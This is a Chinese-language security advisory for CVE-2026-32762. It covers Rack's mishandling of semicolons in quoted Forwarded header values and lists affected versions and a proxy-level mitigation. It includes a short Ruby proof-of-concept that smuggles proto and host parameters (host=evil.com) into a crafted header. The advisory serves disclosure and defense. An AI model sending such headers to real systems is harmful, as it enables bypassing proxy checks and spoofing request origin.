CVE-2026-32762 CVSS 4.8 中危

CVE-2026-32762 Rack Forwarded头部解析漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32762

漏洞类型

HTTP请求走私

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rack

漏洞概述

Rack 是 Ruby Web 服务器接口。受影响版本在解析 Forwarded 头部时存在逻辑缺陷，在处理引号字符串前按分号分割头部。这导致恶意构造的包含分号的引号值被解析为多个指令。攻击者可利用此差异绕过上游代理校验，走私 host、proto 等参数，可能劫持会话或绕过安全限制。

技术细节

漏洞源于 Rack::Utils.forwarded_values 对 RFC 7239 Forwarded 头部的处理不当。标准规定引号内的分号不应作为分隔符，但 Rack 在解析时先按分号分割，导致引号内的分号被误判。当部署环境中存在上游代理或 WAF 时，如果它们严格遵守 RFC 7239 正确处理引号，而 Rack 错误分割，攻击者可发送如 `For="[;proto=https];by=attacker"` 的头部。代理认为这是一个合法的 `For` 值，但 Rack 将其解析为 `For="["` 和 `proto=https`，从而注入恶意参数。这可能导致信任伪造的请求来源或协议（HTTP/HTTPS），绕过安全逻辑。

攻击链分析

STEP 1

构造恶意请求

攻击者构造包含特殊字符的 Forwarded 头部，在引号内插入分号以分割参数。

STEP 2

绕过中间件

请求经过合规的 WAF 或代理，由于遵循 RFC 标准，引号内的分号不被视为分隔符，请求被放行。

STEP 3

触发解析漏洞

Rack 接收到请求后，错误地按分号切分头部，将原本属于值的字符串解析为新的参数键值对。

STEP 4

利用走私参数

应用基于被污染的参数（如伪造的 proto 或 host）处理请求，导致安全策略绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-32762
# Demonstrates smuggling a 'proto' parameter within a quoted 'for' value.

require 'net/http'

uri = URI('http://target-app.local/')

# The payload includes a semicolon inside the quoted string.
# A compliant proxy sees one directive. Rack sees two.
malicious_header = 'For="[;proto=https;host=evil.com]"'

req = Net::HTTP::Get.new(uri)
req['Forwarded'] = malicious_header

res = Net::HTTP.start(uri.hostname, uri.port) do |http|
  http.request(req)
end

puts res.body

影响范围

3.0.0.beta1 <= Rack < 3.1.21

3.2.0 <= Rack < 3.2.6

防御指南

临时缓解措施

若无法立即升级，建议在反向代理（如 Nginx）层面删除传入请求中的 Forwarded 头部，或者配置 Rack 忽略该头部，改用经过严格验证的 X-Forwarded-* 系列头部。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表